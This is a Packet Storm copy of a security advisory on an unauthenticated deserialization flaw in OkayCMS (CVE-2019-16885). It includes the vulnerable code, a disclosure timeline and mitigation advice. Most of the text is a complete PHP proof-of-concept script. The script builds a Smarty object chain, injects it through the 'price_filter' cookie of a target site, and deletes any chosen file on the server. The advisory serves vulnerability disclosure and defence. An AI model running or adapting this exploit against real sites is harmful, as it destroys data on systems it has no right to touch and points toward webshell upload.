exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OkayCMS 2.3.4 Remote Code Execution

OkayCMS 2.3.4 Remote Code Execution
Posted Dec 6, 2019
Authored by Wolfgang Hotwagner

OkayCMS versions 2.3.4 and below suffer from remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2019-16885
SHA-256 | 7f93ec5906c470aa01e72bae7fcea75339c5142109a918a45290242c07b24afc

OkayCMS 2.3.4 Remote Code Execution

Change Mirror Download
# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content managment system for an online store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in "view/ProductsView.php" using the cookie "price_filter" or in "api/Comparison.php" via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in "api/Comparison.php":

```
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```
$price_filter = unserialize($_COOKIE['price_filter']);
```


## Proof of Concept
The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:

```
<?php

if($argc != 3)
{
print "usage: $argv[0] <url> <file>\n";
exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
$cached->is_locked = false;
@unlink($cached->lock_id);
}
}

class Smarty_Template_Cached {
public $handler = null;
public $is_locked = true;
public $lock_id = "";

public function __construct() {
$this->lock_id = $GLOBALS['file'];
$this->handler = new Smarty_Internal_CacheResource_File;
}
}


class Smarty {
public $cache_locking = true;
}

class Smarty_Internal_Template {
public $smarty = null;
public $cached = null;

public function __construct() {
$this->smarty = new Smarty;
$this->cached = new Smarty_Template_Cached;
}

public function __destruct(){
if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
$this->cached->handler->releaseLock($this->smarty, $this->cached);
}
}
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
'Accept-Language: en-US,en;q=0.5',
"Referer: $url/en/catalog/myagkie-igrushki",
'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
print curl_error($curl);
}
curl_close($curl);


print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.

## Vulnerable Versions
versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.

## References:
* https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close